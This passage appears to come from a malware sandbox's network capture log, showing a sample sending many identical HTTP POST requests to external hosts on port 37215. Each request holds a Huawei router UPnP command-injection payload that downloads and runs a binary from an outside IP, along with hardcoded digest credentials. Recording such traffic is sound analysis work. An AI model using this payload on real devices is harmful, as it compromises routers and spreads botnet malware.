20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1444192.168.2.135776441.227.232.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484461069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1445192.168.2.135152841.58.135.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484469891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1446192.168.2.1332812129.96.180.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484482050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1447192.168.2.1345502157.10.177.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484600067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1448192.168.2.1339654197.0.128.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484602928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1449192.168.2.133361059.145.200.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484611034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1450192.168.2.1342942157.243.29.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484622955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1451192.168.2.133453041.66.125.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484622955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1452192.168.2.135799697.176.83.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484632015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1453192.168.2.1347884197.227.72.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484637976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1454192.168.2.1356758157.39.9.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484930038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
